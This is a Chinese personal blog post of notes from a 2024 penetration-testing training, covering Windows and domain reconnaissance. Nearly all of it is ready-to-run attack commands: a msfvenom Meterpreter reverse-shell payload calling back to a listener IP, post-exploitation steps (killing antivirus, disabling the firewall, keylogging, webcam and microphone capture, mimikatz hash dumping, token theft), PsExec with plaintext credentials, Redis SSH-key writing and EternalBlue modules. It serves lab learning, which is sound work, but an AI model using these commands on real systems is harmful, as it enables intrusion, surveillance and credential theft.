<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16.ico">
  <link rel="mask-icon" href="/images/favicon-32.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ashestar.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="2024网络安全攻防技术培训部分笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="2024网络安全攻防技术培训">
<meta property="og:url" content="https://ashestar.github.io/2024/06/25/af823ac554d6/index.html">
<meta property="og:site_name" content="Gone With the Wind">
<meta property="og:description" content="2024网络安全攻防技术培训部分笔记">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-06-25T01:00:00.000Z">
<meta property="article:modified_time" content="2024-07-11T10:05:06.590Z">
<meta property="article:author" content="谂独">
<meta property="article:tag" content="培训">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ashestar.github.io/2024/06/25/af823ac554d6/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>2024网络安全攻防技术培训 | Gone With the Wind</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Gone With the Wind</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">谂独的部落阁</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">29</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">35</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">48</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ashestar.github.io/2024/06/25/af823ac554d6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="谂独">
      <meta itemprop="description" content="Help me understand the best is yet to come <br/> Take me by the hand before I come undone">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Gone With the Wind">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2024网络安全攻防技术培训
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-06-25 09:00:00" itemprop="dateCreated datePublished" datetime="2024-06-25T09:00:00+08:00">2024-06-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-07-11 18:05:06" itemprop="dateModified" datetime="2024-07-11T18:05:06+08:00">2024-07-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%9F%B9%E8%AE%AD/" itemprop="url" rel="index"><span itemprop="name">培训</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%9F%B9%E8%AE%AD/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>2024网络安全攻防技术培训部分笔记</p>
<span id="more"></span>

<h1 id="Windows信息收集"><a href="#Windows信息收集" class="headerlink" title="Windows信息收集"></a>Windows信息收集</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># windows信息收集</span></span><br><span class="line"> ipconfig /all   <span class="comment"># 查看本机ip，所在域</span></span><br><span class="line"> route <span class="built_in">print</span>     <span class="comment"># 打印路由信息</span></span><br><span class="line"> net view        <span class="comment"># 查看局域网内其他主机名</span></span><br><span class="line"> arp -a          <span class="comment"># 查看arp缓存</span></span><br><span class="line"> net start       <span class="comment"># 查看开启了哪些服务</span></span><br><span class="line"> net share       <span class="comment"># 查看开启了哪些共享</span></span><br><span class="line"> net share ipc$  <span class="comment"># 开启ipc共享</span></span><br><span class="line"> net share c$    <span class="comment"># 开启c盘共享</span></span><br><span class="line"> net use \\192.168.xx.xx\ipc$ <span class="string">&quot;&quot;</span> /user:<span class="string">&quot;&quot;</span>    <span class="comment"># 与192.168.xx.xx建立空连接</span></span><br><span class="line"> net use \\192.168.xx.xx\c$ <span class="string">&quot;密码&quot;</span> /user:<span class="string">&quot;用户名&quot;</span>    <span class="comment"># 建立c盘共享</span></span><br><span class="line"> <span class="built_in">dir</span> \\192.168.xx.xx\c$\user    <span class="comment"># 查看192.168.xx.xx c盘user目录下的文件</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 域信息收集</span></span><br><span class="line"> net config Workstation    <span class="comment"># 查看计算机名、全名、用户名、系统版本、工作站、域、登录域</span></span><br><span class="line"> net user                 <span class="comment"># 查看本机用户列表</span></span><br><span class="line"> net user /domain         <span class="comment"># 查看域用户</span></span><br><span class="line"> net localgroup administrators    <span class="comment"># 查看本地管理员组（通常会有域用户）</span></span><br><span class="line"> net view /domain         <span class="comment"># 查看有几个域</span></span><br><span class="line"> net user 用户名 /domain   <span class="comment"># 获取指定域用户的信息</span></span><br><span class="line"> net group /domain        <span class="comment"># 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）</span></span><br><span class="line"> net group 组名 /domain    <span class="comment"># 查看域中某工作组</span></span><br><span class="line"> net group <span class="string">&quot;domain admins&quot;</span> /domain  <span class="comment"># 查看域管理员的名字</span></span><br><span class="line"> net group <span class="string">&quot;domain computers&quot;</span> /domain  <span class="comment"># 查看域中的其他主机名</span></span><br><span class="line"> net group <span class="string">&quot;doamin controllers&quot;</span> /domain  <span class="comment"># 查看域控制器（可能有多台）</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 添加用户</span></span><br><span class="line"> net user xx xxxx /add      <span class="comment"># 添加用户</span></span><br><span class="line"> net localgroup administrators xx /add  <span class="comment"># 添加用户到域</span></span><br></pre></td></tr></table></figure>

<p>使用Metasploit生成反弹shell后门程序，上传靶机执行，上线后抓取口令。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/x319427393/article/details/129366648">Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line"></span><br><span class="line"><span class="comment"># msf6 &gt;</span></span><br><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.24.31.172 LPORT=5353 -f exe &gt; shell.exe   <span class="comment"># 生成反传程序</span></span><br><span class="line"></span><br><span class="line">use exploit/multi/handler</span><br><span class="line"></span><br><span class="line"><span class="comment"># msf6 exploit(multi/handler) &gt;</span></span><br><span class="line"><span class="built_in">set</span> payload windows/meterpreter/reverse_tcp   <span class="comment"># 设置payload</span></span><br><span class="line"></span><br><span class="line">show options <span class="comment"># 查看配置</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> lhost 172.24.31.172     <span class="comment"># 配置lhost，lport配置同理</span></span><br><span class="line"></span><br><span class="line">exploit <span class="comment"># 监听反传，需要先将前面生成的反传程序在靶机运行</span></span><br></pre></td></tr></table></figure>

<p>成功劫持后常用模块：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">1、获取系统运行平台: sysinfo</span><br><span class="line">2、提取系统信息: run scraper</span><br><span class="line">3、查看进行: ps</span><br><span class="line">4、迁移进行: migrate 1774</span><br><span class="line">5、查看文件: <span class="built_in">cat</span> 文件</span><br><span class="line">6、查看当前路径: <span class="built_in">pwd</span></span><br><span class="line">7、搜索文件: search -d c:\\ -f *.doc</span><br><span class="line">8、其他命令类似于Linux命令: <span class="built_in">cd</span>, <span class="built_in">rm</span>, <span class="built_in">mkdir</span>, <span class="built_in">rmdir</span>, <span class="built_in">dir</span>, <span class="built_in">mv</span>等等</span><br><span class="line">9、上传文件: upload 本机路径 上传目标路径</span><br><span class="line">10、下载文件: download 目标路径 本机路径</span><br><span class="line">11、进程迁移: run post/windows/manage/migrate</span><br><span class="line">12、关闭杀软: run post/windows/manage/killav</span><br><span class="line">13、通过shell来关闭防火墙: netsh advfirewall <span class="built_in">set</span> allprofiles state off </span><br><span class="line">14、截屏: screenshot</span><br><span class="line">15、查看桌面: run vnc</span><br><span class="line">16、开启3389: run post/windows/manage/enable_rdp</span><br><span class="line">17、提权模块: mult/recon/local_exploit_suggester 设置过去的session ID</span><br><span class="line">				 执行之后会返回可以提权的模块，然后进行调用，设置session提权，成功会返回新的会话</span><br><span class="line">18、运行程序: execute -f notepad.exe 加H可以进行隐藏运行</span><br><span class="line">19、摄像头命令:</span><br><span class="line">					音频录制: record_mic</span><br><span class="line">					查看摄像头接口: webcam_chat</span><br><span class="line">					查看摄像头列表: webcam_list</span><br><span class="line">					摄像头视频获取: webcam_stream</span><br><span class="line">20、端口转发: 作用如果目标机器在内网开放3389，外网无法连接，这个时候进行端口转发，利用会话将目标机器3389转发到本地，实现3389远程连接</span><br><span class="line">					-L: 要监听的本地主机ip（可选）</span><br><span class="line">					-h: 帮助</span><br><span class="line">					-l: 要监听的本地端口</span><br><span class="line">					-p: 要连接到的远程端口</span><br><span class="line">					-r: 要连接的远程主机ip</span><br><span class="line">					portfwd add -l 4444 -p 3389 -r 10.211.55.7 // 把目标机10.211.55.7的3389端口转发到本机127.0.0.1的4444端口，直接进行连接本机4444端口即可3389远程连接，同样如果本地两台电脑，另一台电脑直接远程访问开启4444主机的IP+4444可以直接进行连接，，，，注意端口转发并不需要高权限上线就可以直接转发。</span><br><span class="line">21、键盘记录:</span><br><span class="line">				keyscan_start: 开启键盘记录功能</span><br><span class="line">				keyscan_dump: 显示捕捉的键盘记录信息</span><br><span class="line">				keyscan_stop: 停止键盘记录</span><br><span class="line">21、获取<span class="built_in">hash</span>值: load mimikatz（32位）load kivi（64位）此时调用完成就直接可以使用该模块的命令，但是使用该命令需要拥有系统system权限，同样也可以使用hashdump导出</span><br><span class="line">22、盗取身份令牌: use incognito</span><br><span class="line">					list_tokens -u: 列出目标主机用户组可用的令牌，有的话可以直接进行身份切换</span><br><span class="line">					list_tokens -g: 列出目标主机用户组可用的令牌，有的话可以直接进行身份切换</span><br><span class="line">					impersonate_token LUCKYXBDC6\luckyx: 切换令牌身份</span><br></pre></td></tr></table></figure>

<p>使用微软PsExec工具连接服务器cmd，控制域控。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44874645/article/details/121394678">【渗透测试笔记】之【内网渗透——横向移动：PsExec的使用】</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PsExec64.exe /accepteula /s \\192.168.52.138 -u Administrator -p 12345@QwerT cmd</span><br></pre></td></tr></table></figure>

<h1 id="内网穿透"><a href="#内网穿透" class="headerlink" title="内网穿透"></a>内网穿透</h1><p>工具：</p>
<ul>
<li>ew</li>
<li>frp</li>
<li>nps</li>
<li>metasploit</li>
<li>CobalStrike</li>
</ul>
<h1 id="尝试"><a href="#尝试" class="headerlink" title="尝试"></a>尝试</h1><p>fscan 扫描端口与服务。</p>
<p>比如扫出 cve 漏洞，搜索如何利用漏洞攻击；redis未授权漏洞中 <code>/root/.ssh/</code> 可写的话可直接上传公钥连接ssh。</p>
<ul>
<li>通过redis备份方式写入</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-qing-/p/10978912.html">Redis未授权访问写Webshell和公私钥认证获取root权限</a></p>
<ul>
<li>通过fscan写入redis文件</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fscan -h 172.24.31.169 -rf /home/kali/.ssh/id_rsa.pub</span><br><span class="line"></span><br><span class="line">ssh -i id_rsa root@172.24.31.169</span><br></pre></td></tr></table></figure>

<p>注：使用python开启web下载服务器</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># python2 开启web下载服务器（后台有日志）</span></span><br><span class="line"><span class="built_in">nohup</span> python -u -m SimpleHTTPServer &gt; download.log 2&gt;&amp;1 &amp;</span><br><span class="line"></span><br><span class="line"><span class="comment"># python3 开启web下载服务器</span></span><br><span class="line">python -m http.server 8000</span><br></pre></td></tr></table></figure>

<p>msf攻击windows靶机，假设靶机拥有<code>MS17-010</code>漏洞：</p>
<p>win7使用<code>exploit/windows/smb/ms17_010_eternalblue</code>比较稳定，win2012及以上使用<code>exploit/windows/smb/ms17_010_psexec</code>较稳定。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43645782/article/details/106870256">msf下MS17-010模块使用总结</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E5%9F%B9%E8%AE%AD/" rel="tag"><i class="fa fa-tag"></i> 培训</a>
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"><i class="fa fa-tag"></i> 网络安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/06/14/e51da90de844/" rel="prev" title="2024网络安全培训">
      <i class="fa fa-chevron-left"></i> 2024网络安全培训
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/06/27/0a69b13e5192/" rel="next" title="2024网络安全资产测绘培训">
      2024网络安全资产测绘培训 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Windows%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">Windows信息收集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F"><span class="nav-number">2.</span> <span class="nav-text">内网穿透</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B0%9D%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">尝试</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谂独"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">谂独</p>
  <div class="site-description" itemprop="description">Help me understand the best is yet to come <br/> Take me by the hand before I come undone</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">48</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">35</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">29</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Ashestar" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Ashestar" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:neonat@163.com" title="E-Mail → mailto:neonat@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>




        <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=298 height=52 src="//music.163.com/outchain/player?type=2&id=1471724841&auto=0&height=32"></iframe>
      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谂独</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


  
    <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
    <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
    <script type="text/javascript" src="/js/fireworks.js"></script>
  
</body>
</html>
